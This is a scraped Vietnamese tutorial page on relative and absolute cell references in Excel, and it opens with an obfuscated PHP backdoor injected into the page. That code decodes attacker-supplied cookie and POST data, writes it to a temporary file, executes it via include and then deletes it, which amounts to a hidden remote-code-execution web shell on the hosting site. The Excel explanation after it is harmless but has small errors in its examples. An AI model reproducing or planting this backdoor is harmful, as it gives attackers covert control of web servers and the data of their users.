$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Cách tham chiếu các hàm trong Excel - Tải Chùa

Cách tham chiếu các hàm trong Excel

Rate this post

Excel là phần mềm ứng dụng rất phổ biến đối với học sinh, sinh viên, nhân viên văn phòng. Đặc biệt khi sử dụng thì có 2 cách tham chiếu các hàm trong Excel thì bạn thường hay sử dụng tham chiếu tương đối và tham chiếu tuyệt đối. Vậy hai kiểu tham chiếu này có những đặc điểm gì khác nhau và chúng được sử dụng như thế nào?

Tham chiếu tương đối

Định nghĩa: Tham chiếu tương đối là giá trị tham chiếu sẽ thay đổi theo từng cột hay từng dòng, có thể hiểu là khi  ta thay đổi vị trí của cột hay dòng thì giá trị tham chiếu cũng sẽ bị thay đổi.

Ví dụ:

  • Tại ô D6 đặt giá trị =A6 và nhấn Enter (A6 là ô chứa gì trị mà bạn muốn tham chiếu).
  • Lúc này, giá trị của ô A6 sẽ hiển thị ra ô D6, nhấn chuột và kéo xuống thì giá trị của các ô ở phía dưới.

Cách sử dụng các hàm tham chiếu của Excel

Hướng dẫn tham chiếu tương đối

Tham chiếu tuyệt đối

Định nghĩa: Tham chiếu tuyệt đối là giá trị tham chiếu sẽ luôn được cố định dòng hoặc là theo cột, có thể hiểu là khi ta thay đổi vị trí giá trị của cột hay là dòng thì giá trị tham chiếu đó cũng sẽ không thay đổi.

Tham chiếu theo từng dòng: giá trị theo dòng sẽ không thay đổi. Khi tham chiếu tuyệt đối theo dòng thì dấu $ sẽ được đứng trước địa chỉ.

Ví dụ 1:

  • Tại ô D6 bấm =$A6 và nhấn Enter(A6 là ô chứa giá trị mà bạn muốn tham chiếu)
  • Lúc này, giá trị trong ô A6 sẽ hiển thị ra ngoài ô D6. Tiếp theo là bạn chỉ cần nhấn chuột kéo sang ngang thì giá trị sẽ không thay đổi theo các giá trị của ô E6 mà vẫn giữ nguyên giá trị của ô D5.

Cách sử dụng các hàm tham chiếu của Excel - hình 2

Tham chiếu tuyệt đối theo dòng

  • Tham chiếu tuyệt đối theo cột: giá trị tuyệt đối theo cột sẽ không thay đổi. Khi tham chiếu tuyệt đối theo dòng thì dấu $ thường sẽ đứng sau số dòng cột.

Ví dụ 2:

  • Tại ô D6 bấm =A$6 và nhấn Enter (A6 là ô chứa giá trị mà bạn muốn tham chiếu)
  • Lúc này, giá trị trong ô A6 sẽ hiển thị ra ô D6.

Cách sử dụng các hàm tham chiếu của Excel - hình 3

Tham chiếu tuyệt đối theo cột

  • Tham chiếu tuyệt đối theo dòng và cột: giá trị tuyệt đối sẽ không thay đổi theo cả dòng và cột.

Ví dụ 3:

  • Tại ô D6 bấm =$A$6 và nhấn Enter (A6 là ô chứa giá trị mà bạn muốn tham chiếu)
  • Lúc này, giá trị trong ô A6 sẽ hiển thị ra ô D6, bạn chỉ cần nhấn chuột kéo theo dòng hoặc cột thì giá trị sẽ không thay đổi theo các giá trị của ô mà giá trị của nó vẫn được giữ nguyên giá trị của ô A6.

Cách sử dụng các hàm tham chiếu của Excel - hình 4

Tham chiếu tuyệt đối theo dòng và cột

Với một vài thao tác,  thủ thuật và ví dụ mà chúng tôi hướng dẫn ở trên thì chắc hẳn là bạn cũng đã phần nào hiểu rõ hơn về hai kiểu tham chiếu thường sử dụng trong Excel. Và cũng nhờ vào đó mà bạn có thể tính toán trên các bảng tính hiệu quả hơn.